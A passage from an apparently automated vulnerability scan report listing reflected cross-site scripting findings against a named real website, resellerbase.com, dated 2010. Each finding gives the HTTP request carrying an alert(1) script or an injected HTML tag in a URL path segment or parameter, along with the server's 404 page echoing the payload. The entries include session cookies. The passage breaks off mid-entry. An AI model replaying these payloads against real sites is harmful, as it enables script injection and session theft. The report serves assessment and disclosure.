<p>The requested URL /detail/30699bb<script>alert(1)</script>3e492f82f3d/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2091. http://www.resellerbase.com/detail/30/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload db05a<script>alert(1)</script>912d1e44827 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/search.phpdb05a<script>alert(1)</script>912d1e44827?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/search.phpdb05a<script>alert(1)</script>912d1e44827?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2092. http://www.resellerbase.com/detail/30/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/30/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 792ec<a>5c6145562aa was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/30/search.php?keyword=search...&Submit3=Search792ec<a>5c6145562aa&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/search.php?keyword=search...&Submit3=Search792ec<a>5c6145562aa&opt=2 was not found on this server.</p>
...[SNIP]...

2.2093. http://www.resellerbase.com/detail/30/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/30/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload c4997<a>6084a4125db was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/30/search.php?keyword=search...c4997<a>6084a4125db&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/search.php?keyword=search...c4997<a>6084a4125db&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2094. http://www.resellerbase.com/detail/30/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 62881<script>alert(1)</script>b1a16e1082 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/search.php?keyword=search...&Submit3=Search&opt=2&62881<script>alert(1)</script>b1a16e1082=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/search.php?keyword=search...&Submit3=Search&opt=2&62881<script>alert(1)</script>b1a16e1082=1 was not found on this server.</p>
...[SNIP]...

2.2095. http://www.resellerbase.com/detail/30/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/30/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload d93d0<a>a2ead3a44ab was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/30/search.php?keyword=search...&Submit3=Search&opt=2d93d0<a>a2ead3a44ab HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/search.php?keyword=search...&Submit3=Search&opt=2d93d0<a>a2ead3a44ab was not found on this server.</p>
...[SNIP]...

2.2096. http://www.resellerbase.com/detail/30/spacash-com.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/spacash-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b5094<script>alert(1)</script>217d2cdf23f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailb5094<script>alert(1)</script>217d2cdf23f/30/spacash-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailb5094<script>alert(1)</script>217d2cdf23f/30/spacash-com.html was not found on this server.</p>
...[SNIP]...

2.2097. http://www.resellerbase.com/detail/30/spacash-com.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/30/spacash-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 50887<a>a6e682eb0a1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/3050887<a>a6e682eb0a1/spacash-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3050887<a>a6e682eb0a1/spacash-com.html was not found on this server.</p>
...[SNIP]...

2.2098. http://www.resellerbase.com/detail/30/spacash-com.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/spacash-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7eec3<script>alert(1)</script>9a03104327d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/7eec3<script>alert(1)</script>9a03104327d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/7eec3<script>alert(1)</script>9a03104327d was not found on this server.</p>
...[SNIP]...

2.2099. http://www.resellerbase.com/detail/30/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2244f<script>alert(1)</script>db7cc674102 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail2244f<script>alert(1)</script>db7cc674102/30/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail2244f<script>alert(1)</script>db7cc674102/30/themes/ was not found on this server.</p>
...[SNIP]...

2.2100. http://www.resellerbase.com/detail/30/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload abfd5<script>alert(1)</script>4d59e0af64d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30abfd5<script>alert(1)</script>4d59e0af64d/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30abfd5<script>alert(1)</script>4d59e0af64d/themes/ was not found on this server.</p>
...[SNIP]...

2.2101. http://www.resellerbase.com/detail/30/themes/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8c265<script>alert(1)</script>c46688add0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes8c265<script>alert(1)</script>c46688add0/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes8c265<script>alert(1)</script>c46688add0/ was not found on this server.</p>
...[SNIP]...

2.2102. http://www.resellerbase.com/detail/30/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6cf1f<script>alert(1)</script>5ec738fabcc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/?6cf1f<script>alert(1)</script>5ec738fabcc=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.2103. http://www.resellerbase.com/detail/30/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d29a0<script>alert(1)</script>9a38c2a0668 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild29a0<script>alert(1)</script>9a38c2a0668/30/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild29a0<script>alert(1)</script>9a38c2a0668/30/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2104. http://www.resellerbase.com/detail/30/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 81919<script>alert(1)</script>e38cedf5403 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/3081919<script>alert(1)</script>e38cedf5403/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3081919<script>alert(1)</script>e38cedf5403/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2105. http://www.resellerbase.com/detail/30/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d1efe<script>alert(1)</script>9d7c091b790 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themesd1efe<script>alert(1)</script>9d7c091b790/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themesd1efe<script>alert(1)</script>9d7c091b790/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2106. http://www.resellerbase.com/detail/30/themes/kosmos/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7d122<script>alert(1)</script>6450a139f10 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos7d122<script>alert(1)</script>6450a139f10/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.2107. http://www.resellerbase.com/detail/30/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1f5c7<script>alert(1)</script>836a93682df was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos/?1f5c7<script>alert(1)</script>836a93682df=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/?1f5c7<script>alert(1)</script>836a93682df=1 was not found on this server.</p>
...[SNIP]...

2.2108. http://www.resellerbase.com/detail/30/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9144f<script>alert(1)</script>35ad17dd550 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail9144f<script>alert(1)</script>35ad17dd550/30/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail9144f<script>alert(1)</script>35ad17dd550/30/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2109. http://www.resellerbase.com/detail/30/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 356eb<script>alert(1)</script>41468c291 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30356eb<script>alert(1)</script>41468c291/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30356eb<script>alert(1)</script>41468c291/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2110. http://www.resellerbase.com/detail/30/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f1cd3<script>alert(1)</script>1199bbafdc2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themesf1cd3<script>alert(1)</script>1199bbafdc2/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themesf1cd3<script>alert(1)</script>1199bbafdc2/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2111. http://www.resellerbase.com/detail/30/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 17c19<script>alert(1)</script>511f11550db was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos17c19<script>alert(1)</script>511f11550db/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
